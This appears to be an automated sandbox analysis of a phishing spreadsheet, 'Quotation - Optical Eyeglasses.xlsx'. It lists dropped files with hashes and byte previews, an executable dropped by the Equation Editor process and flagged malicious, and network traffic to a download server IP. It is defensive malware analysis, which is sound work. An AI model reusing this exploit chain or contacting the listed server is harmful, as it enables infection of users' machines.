                  SHA-512:D1877808772B6AEA5A20316B234884383D1165716C98EE8B8C32AE6238FB1454662F1DEE88C5FFAF645ABFAA66C47C889BB44FC59F3DD780884FA590B865D1DF
                  Malicious:false
                  Preview:.........H.J........S......0<................J.........<.L...................-...................".....-...........................".....-....................-...............$.....J.I...I.........J...................-...............-.......-.......-...............$...<...<.....>.....<.......-.......-.......-....................-...............$.....,.&...&. .......,.....-...............-.......-.......-...............$.....0.....3...3.....0.....-.......-.......-....................-...............$.....G.M...M.........G.....-...............-.......-....................-...............$.....G.M...M.........G.....-...............-.......-....................-...............$.A.........................4. .H.+.[.9.k.G.z.W...h...y...................................*.z.;.k.K.[.Y.H.g.4.r...|.........................p...W...?...).|...r...g...Y...K...;...*...................................y...h...W...G...9...+... .)...?...W...p...............-...............-.......-....................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):13394
                  Entropy (8bit):5.102000191951563
                  Encrypted:false
                  SSDEEP:384:57kA2HxAhR/SyE7lxN4JVNxqdNVrvDCkC90t272X3+WRB7uea1jiRs36tRFVJBeB:57kA2HxAhR/SyEZxN4JVNxqBrvDCd0tw
                  MD5:35B6242416DED72F4D2D5BA2C5403DFC
                  SHA1:D2D50B0D18F99ED5B23A5932B8321D0543F8A5C3
                  SHA-256:93A6FC6436D546AF2B6C6215A5E9D3A227503AEFEE117371EEBFACD0E92FC9F5
                  SHA-512:5E528B0274CE7F59D4E682FB2F98E4C3846AA831DCDC9ED8B5CC2FE3F250BF824E19B3E35CE70B24F91D9736FD9B1E882A4D0BD359B2DED30C661EACACD4D842
                  Malicious:false
                  Preview:...........r.......YT............4...........r.........1.....................-...................".....-...........................".....-.....................-...............$.........r...r...........................-.......-.......-............?........-...............$...4...4...E...0...4.......-...............-.......-...........-.........-...............$...A...0...E...A...A.......-...............-.......-............?........-...............$...I...g...r.r.p.r.T...d...I.......-...............-.......-............?........-...............$.....r.r.r.g...4.....I...........r.....-...............-.......-............?........-...............$...T...x.....I.d...T.......-...............-.......-............?........-...............$.........u.x...>.......`...........-...............-.......-...........-.........-...............$.........r...q.......r...r.........-...............-.......-...........-.........-...............$.........2.......q...q.............-...............-.......-.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):5692
                  Entropy (8bit):5.68725659600945
                  Encrypted:false
                  SSDEEP:96:qWx0ICjEkAs38UeWpOr6v1U/+nZyi2Wkv5i0x32+seq7BLImM6INLVCCT7l0eGY4:1xDmEkb8Umr6ve+nZb2f5i0x2+7q7dI8
                  MD5:B33DD28C53DA7132F9C4687C8FF934AF
                  SHA1:3762EDDF3184EB12CA65B35266FBEC29CA14DEAD
                  SHA-256:1FA49081C44D54B1BE8A5D36C5C9271A7BC108F5141056723CF3EFEC4962D8BE
                  SHA-512:7DB4EB02A988A223530B68A90524EB2C1AABBC3867EFC453476693D7B8562F598B31C5A10E8F3B7304FD278D6BBDFF3A569DBEA1B3B3B2E81A415FF1DA7165F5
                  Malicious:false
                  Preview:.....v. .).........PT..........................v.......J.....................-...................".....-...........................".....-....................-...............$.A.(.,.T.*...#.................=...\...x.....l...H..."...............y...M...!.................x.d.\.F.=.).....................T...(...................Y...5.....)...F...d...................!.x.M.v.y.x............."...H...l.............5...Y.............#...*.(.,...................-...............-.......-.....................-...............$.A.v.........{...q...b.E.P.i.:...!...................{...T. .*.'...)...'... .{...Q...).....................i.j.E.T...B...3...)...".v. .J."...)...3...B...T...j.a...C...&.............)...Q...{...............*...T...{.........&...C...a.!...:...P...b...q...{.J...v.......-...............-.......-.....................-...............$.q...............................z...s...l...e...^...X...S...N...K...H...@...6...*.....4...L...a...v.................n...S...7.........P...P.s.;.v.(.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):9142
                  Entropy (8bit):5.831641085312416
                  Encrypted:false
                  SSDEEP:192:sjsCW0P2qkxIn67FhDbOMQRJsXaZjwIawoLevwFtCJo/0HR70Q/XGI+yaIWS4g4D:sjsV0PNkW67FhDaMQfsXaWIawT4FtCJg
                  MD5:EDFEF94C6F9587BC790758D5D9693D50
                  SHA1:76FF70799E5EF874B611264C4DB94164D050A3F7
                  SHA-256:ED699D5F9576FDCF0E39EF03C10F2CEA8890B4942DD7AB78BF1DE07676962FD5
                  SHA-512:11F535B4A9A5547E9FB3F1F258486569F5028186F1FD18BF35C060EAA4886D67CB7054CA81289FACC9133D25FF268D6D2A12E7230A9998FAAEB1FAF002AF20AB
                  Malicious:false
                  Preview:.....H.....U.....................b...........U.H.......E.....................-...................".....-...........................".....-.....................-...............$...H.U.H.........U.H.U...................-.......-.......-............h........-...............$...........................-...............-.......-...........[.........-...............$.D...t.................t...a...N...;...'...............................w..._...G.../.........................!.|.$.b.&.G.).,.+...,...-......./.../.../.e...G.-.).,...*...(...%...".....}...a...F...+...........................{...d...M...7...!.................................t.....-...............-.......-............h........-...............$.....h.C.h.C.........h.....-...............-.......-............h........-...............$...........................-...............-.......-............h........-...........b...$./.............2...Q...o.........................w.4.l.N._.g.S...F...8...X...c.q.m.].w.I...4.......................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 577 x 201, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):9920
                  Entropy (8bit):7.680823551882418
                  Encrypted:false
                  SSDEEP:192:Kcqdy0jT4tDZ3hwGFnIgvEGHEZsuMerPnuM3/g+BYKYp0:pq7jstthwyIJGxuprWso+BYKYp0
                  MD5:5AF9F8C3DCDB3C155D4283AA797BA7C3
                  SHA1:226BE2FD7230B34B060FC1C31F5C1A131D0BD01E
                  SHA-256:29C1F433CDDCB4DE1179CC18182E5052BDE598F560C36FFEAB7975E9F193297C
                  SHA-512:FF06FCAEB0F521A45B18356DE4230FFBAD7687A183229841017888D6FB97A971BBAF4C98AD7CD46B78D0E3169DF4630DEE2DC155BAB75B903D9C024B45D71A1A
                  Malicious:false
                  Preview:.PNG........IHDR...A.........$x.1....sRGB.........gAMA......a.....pHYs..........+....&UIDATx^.M.V....B2....&tH.1.H...(.....:h..5.`$.h&.n.m}..d.u&.tP^......[...L#.@.t........cr....:.T.]U..:.....q..X..Z.vU.h..*.. ...@........1}Q...... ...8..A8.. ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):12600
                  Entropy (8bit):5.406932409911072
                  Encrypted:false
                  SSDEEP:384:Iz4+CJDxb6kHwPh86pEnCHuNMK4fed1dLUHLq65CgO2GmmQYbh3xpJGvuCeJWlnx:IrCJDxb6kHwPh86pEnCHuNMK4fe7dL2F
                  MD5:E36EE51F1EC331B2FD1E62230CE4CDC9
                  SHA1:23C604663C21D30FCA671802EF5DCE892A32C79A
                  SHA-256:90CABD958AF7364A82D304E222B295BDE98A2FE5500037ACEA267FA7CF098E11
                  SHA-512:DD26855CE91F02E42B4352C5264CA00082B5766558689A704346C89703942A21E053B2E0C8F0B19D469973BACA28526929AAE75303F5D17B71CBFF654297BA89
                  Malicious:false
                  Preview:.....p. .(.........fT............6.............p.......9.....................-...................".....-...........................".....-.....................-...............$.f.~.L.|.N.{.P.y.R.w.T.s.O.p.K.l.F.h.B.d.=.a.9.\.4.X./.N.%.D...:.../...%.................................................$.......9...C.u.M.j.W._.a.T.k.H.t.=.}.1...%.............................................................................{.&.t.1.m.<.d.G.\.R.R.\.I.g.?.q.5.{.+...!.........................................................$.../...9...C...L...U...[...a...h.&.n...t.5.{.;...B...H...J...L...M.~.L...................-...............-.......-.....................-...............$.f...P...b...t.........$.../...:...E...W...c...g.c.f.;._...S...C.../...4...9...>...C...G...L...S...Z...c...l...w.0...B...S...d...t...........................n...I...&...............................................................&.#.3.4.?.F.K.W.U.j._.|.i...q...y...U...4.....{...g...Q...7.......'...4...A...O...Z...c...h.{.i.v.b.o.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 577 x 201, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):9920
                  Entropy (8bit):7.680823551882418
                  Encrypted:false
                  SSDEEP:192:Kcqdy0jT4tDZ3hwGFnIgvEGHEZsuMerPnuM3/g+BYKYp0:pq7jstthwyIJGxuprWso+BYKYp0
                  MD5:5AF9F8C3DCDB3C155D4283AA797BA7C3
                  SHA1:226BE2FD7230B34B060FC1C31F5C1A131D0BD01E
                  SHA-256:29C1F433CDDCB4DE1179CC18182E5052BDE598F560C36FFEAB7975E9F193297C
                  SHA-512:FF06FCAEB0F521A45B18356DE4230FFBAD7687A183229841017888D6FB97A971BBAF4C98AD7CD46B78D0E3169DF4630DEE2DC155BAB75B903D9C024B45D71A1A
                  Malicious:false
                  Preview:.PNG........IHDR...A.........$x.1....sRGB.........gAMA......a.....pHYs..........+....&UIDATx^.M.V....B2....&tH.1.H...(.....:h..5.`$.h&.n.m}..d.u&.tP^......[...L#.@.t........cr....:.T.]U..:.....q..X..Z.vU.h..*.. ...@........1}Q...... ...8..A8.. ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):10770
                  Entropy (8bit):5.171884184642559
                  Encrypted:false
                  SSDEEP:192:HeQeAkykQp+2m+xLu4jA+6+rtBLPQgkUeKCrkKnU7eBiRUgQDMzvudxhnGu7+mRp:He5AkykQp+2NxLLjA+6+rtBLNkUeKC3z
                  MD5:DAE5E2360C20E41A74B50234EAF58B2D
                  SHA1:A310025AAC3C93073F16BEF2056A5C398D9A41BA
                  SHA-256:D5106547F8BF1B9CAB7C24DA1B648CAD51D96120B00B9AC07AF384FEB750D187
                  SHA-512:30EEDD5DCB85B2FF225B165A9B915FA06B787A78BF28A54CB46A7684FE9D94D783E2FFBB800BAA64464FDD56A112F74FB91567F8AA65EC5B68C670289B932912
                  Malicious:false
                  Preview:.....H.....}........S........................}.H.......5.K...................-...................".....-...........................".....-...........I.B.......-...............$...........M...|...................X.......................?...`.............}...r...g...\.".P.7.D.I.7.Z.+.i...u.......................................u...i.w.Z.j.I.].7.Q.".E...9.......#.............`...?.......................X...................|...M...................`...2...................Y...1...................z...Z...;.........#.......9...E...Q...]...j.r.w.e...[...S...M...I...H...I...M...S...[...e...r.....+...7...D...P...\...g...r...}.;...Z...z...................1...Y...................2...`.................................-...............-.......-............z........-...........,...$.....M...Q...U...}.........2...............w.a...5...!...%.B...R.............%...M.....-...............-.......-............B........-...........$...$.........d...C..."......... .....d.!...&.../.../.S.X.?...N.............-.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 114 x 111, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):9007
                  Entropy (8bit):7.965803762230949
                  Encrypted:false
                  SSDEEP:192:xDL+FFfJ6pI4ySj0Qxd2ZSgFGOkBeNn+SG7J2r1KCYZ19:xv+DfJ6K4BlX7I1+SQS7Yh
                  MD5:A21ED528A4278D2D5C5518576B119CB1
                  SHA1:581711E69D65B716A391510C48F77C420453ECBD
                  SHA-256:81C1CD8E58D3B4F5EC76BFC6436EC2FDF1D3B5233AEC0CD6C6E5FE9B424C65C9
                  SHA-512:3A360478C6532545062CB0C5E1E7F07CD040D67665248FF1BD253689B2D0C8EB8FA507471626674BBBD8227F98873FEA6A046382FBA7739E4D4286C42D938729
                  Malicious:false
                  Preview:.PNG........IHDR...r...o.....0..8....sRGB....... .IDATx^........t..3.......dy..7....5.DQDL4.hp.AE.Wp.z...Q.._4*".......e..DA....f...U.LM.=./...s....k.....w.-.u]...{?.Z...{....7..W......E.>}.... [...M=5.1..]fcR....N.....c#.=9q............b....5u.)...M.Y.....%..^w=.......m...}....&8....~.....m.z...< ...7....1...o.!kj..j.X..{.....h.#....;P..o`..x.-..9W.. +...?e/.Cm.|.7.jL..p]..:...n..j.o!1R.F.ad...c.C...f..MCL.V......hx4a.....@.[.D.S.?..E..:w...]..#..........cg..t..-./~Oq.."V.=...@.=EBo...w. .|....JrE.~.K...%..As..0.w.c../`6#F.V.j...ea...z....2.0.A.a.....)0.O..:.tOl.P....8.q.&..:!.ir...*.4.@......D...hn..={.m[..8.....bi6@....W........[[...hH.8...%V.....k. ...!.].x.l0.q.Y...8...qa..v]..$|..j~|$.k.k.............>..@F.a..'QTS.#.E.........X...V...:...(..G\..`..5....[....p..R...h.......:4..u..5..&...A..q.u...cq..\S1P@....H.;....^}..c.-..'..D..=..t.Gs.u0..U...D.a...#.P(F.....W..x...k........Y..g....,;J..A.mB..k.sI.}QL...Rq.q.n.00...[....:......
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):13394
                  Entropy (8bit):5.102000191951563
                  Encrypted:false
                  SSDEEP:384:57kA2HxAhR/SyE7lxN4JVNxqdNVrvDCkC90t272X3+WRB7uea1jiRs36tRFVJBeB:57kA2HxAhR/SyEZxN4JVNxqBrvDCd0tw
                  MD5:35B6242416DED72F4D2D5BA2C5403DFC
                  SHA1:D2D50B0D18F99ED5B23A5932B8321D0543F8A5C3
                  SHA-256:93A6FC6436D546AF2B6C6215A5E9D3A227503AEFEE117371EEBFACD0E92FC9F5
                  SHA-512:5E528B0274CE7F59D4E682FB2F98E4C3846AA831DCDC9ED8B5CC2FE3F250BF824E19B3E35CE70B24F91D9736FD9B1E882A4D0BD359B2DED30C661EACACD4D842
                  Malicious:false
                  Preview:...........r.......YT............4...........r.........1.....................-...................".....-...........................".....-.....................-...............$.........r...r...........................-.......-.......-............?........-...............$...4...4...E...0...4.......-...............-.......-...........-.........-...............$...A...0...E...A...A.......-...............-.......-............?........-...............$...I...g...r.r.p.r.T...d...I.......-...............-.......-............?........-...............$.....r.r.r.g...4.....I...........r.....-...............-.......-............?........-...............$...T...x.....I.d...T.......-...............-.......-............?........-...............$.........u.x...>.......`...........-...............-.......-...........-.........-...............$.........r...q.......r...r.........-...............-.......-...........-.........-...............$.........2.......q...q.............-...............-.......-.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):5692
                  Entropy (8bit):5.68725659600945
                  Encrypted:false
                  SSDEEP:96:qWx0ICjEkAs38UeWpOr6v1U/+nZyi2Wkv5i0x32+seq7BLImM6INLVCCT7l0eGY4:1xDmEkb8Umr6ve+nZb2f5i0x2+7q7dI8
                  MD5:B33DD28C53DA7132F9C4687C8FF934AF
                  SHA1:3762EDDF3184EB12CA65B35266FBEC29CA14DEAD
                  SHA-256:1FA49081C44D54B1BE8A5D36C5C9271A7BC108F5141056723CF3EFEC4962D8BE
                  SHA-512:7DB4EB02A988A223530B68A90524EB2C1AABBC3867EFC453476693D7B8562F598B31C5A10E8F3B7304FD278D6BBDFF3A569DBEA1B3B3B2E81A415FF1DA7165F5
                  Malicious:false
                  Preview:.....v. .).........PT..........................v.......J.....................-...................".....-...........................".....-....................-...............$.A.(.,.T.*...#.................=...\...x.....l...H..."...............y...M...!.................x.d.\.F.=.).....................T...(...................Y...5.....)...F...d...................!.x.M.v.y.x............."...H...l.............5...Y.............#...*.(.,...................-...............-.......-.....................-...............$.A.v.........{...q...b.E.P.i.:...!...................{...T. .*.'...)...'... .{...Q...).....................i.j.E.T...B...3...)...".v. .J."...)...3...B...T...j.a...C...&.............)...Q...{...............*...T...{.........&...C...a.!...:...P...b...q...{.J...v.......-...............-.......-.....................-...............$.q...............................z...s...l...e...^...X...S...N...K...H...@...6...*.....4...L...a...v.................n...S...7.........P...P.s.;.v.(.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:CDFV2 Encrypted
                  Category:dropped
                  Size (bytes):85592
                  Entropy (8bit):7.9145684570229005
                  Encrypted:false
                  SSDEEP:1536:c62dy/S5YtRD+twDkrYP16e79WscmNeFtYbeq8nti5WKfVExbXB9o:c6syq5YtUtwkYP16eYscm6FqH/fV+BG
                  MD5:936A314411E4A93F2DD6A01B51216EF3
                  SHA1:47483467B595BDD9A49B577F457D84BCDB3B1C3B
                  SHA-256:0897C1227E00E63196869DE72F0E4436E8493A7EE095BE94A914D4E547D6AC2E
                  SHA-512:DE25F31575659555CF022CB28783B0FFA5681644B4C77E2ACB9FE5B9233C3F789F8B69BE54AF25F2E8995E1DE7328F7EB24B1ECE9174407934A710379E01425D
                  Malicious:false
                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                  MD5:797869BB881CFBCDAC2064F92B26E46F
                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                  Malicious:true
                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):896512
                  Entropy (8bit):7.735833585263268
                  Encrypted:false
                  SSDEEP:12288:YZkGxgV2iNq+1MCVjjwDcYj5DHXYQn1qLbxhbJE3d7h4eAwRXIbUDbLDuXkjZc0I:KkGxgV10Ctw1jQ/xhbJEtOe9IbUDHDl
                  MD5:A6439DBBF3F848EB6F83494C5C75A7A6
                  SHA1:8381D3D1AC7CAA3BD8033F17B36C8D0ABE54480E
                  SHA-256:1D806C678B4CC86F4BCB769B1D1E613D0AF28336DBAD4FACD0A04ED959D9EDBA
                  SHA-512:AC573AEE0DC0C2C4E3439B6BC3AADCB244310E1713E2E27DA5B752DE6C2E93847002263B11B70D9CD8889D1E81CAA90DA53720909C789755702AF9D132173157
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.................. ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................(....!...........................................0..........*....0.............K...%.r...p.%.rK..p.%.rY..p.}......}.....(.... .m/. ..~fa%..^E........5.......d.......E...+b...(..... ~...Z .f.=a+..{.....(...... .,d.Z ..{a+... ..c.Z &.8Va+...{.....(..... ...zZ .77.a8u...~....t.....{....(....&*.0..:........ ..h ...>a%..^E................+..(..... 6;..Z Qb..a+..*...0...........*...0.................{....(.....(..... .... .rG.a%....^E................v...U.
                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.9145684570229005
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:Quotation - Optical Eyeglasses.xlsx
                  File size:85592
                  MD5:936a314411e4a93f2dd6a01b51216ef3
                  SHA1:47483467b595bdd9a49b577f457d84bcdb3b1c3b
                  SHA256:0897c1227e00e63196869de72f0e4436e8493a7ee095be94a914d4e547d6ac2e
                  SHA512:de25f31575659555cf022cb28783b0ffa5681644b4c77e2acb9fe5b9233c3f789f8b69be54af25f2e8995e1de7328f7eb24b1ece9174407934a710379e01425d
                  SSDEEP:1536:c62dy/S5YtRD+twDkrYP16e79WscmNeFtYbeq8nti5WKfVExbXB9o:c6syq5YtUtwkYP16eYscm6FqH/fV+BG
                  TLSH:5283E1A67393EB6FE2B307395667C59F8DA56C52FA10B1942D1CF9DC287B40C4B21311
                  File Content Preview:........................>......................................................................................................................................................................................................................................
                  Icon Hash:e4e2aa8aa4b4bcb4
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 8, 2022 17:26:50.680366039 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:50.795311928 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.795440912 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:50.796442986 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:50.915329933 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915393114 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915414095 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915431976 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915451050 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915467024 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915483952 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915499926 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915514946 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915529966 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:50.915543079 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:50.915570021 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:50.915572882 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:50.915607929 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:50.926500082 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030044079 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030087948 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030109882 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030128956 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030144930 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030160904 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030175924 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030190945 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030203104 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030217886 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030231953 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030235052 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030250072 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030256987 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030267000 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030267954 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030282974 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030289888 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030299902 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030304909 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030316114 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030323982 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030332088 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030340910 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030347109 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030356884 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030363083 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030371904 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030379057 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.030390024 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030405045 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.030421019 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.031045914 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.144891024 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.144934893 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.144951105 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.144964933 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.144983053 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.144999027 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145015955 CEST8049179198.12.89.152192.168.2.22
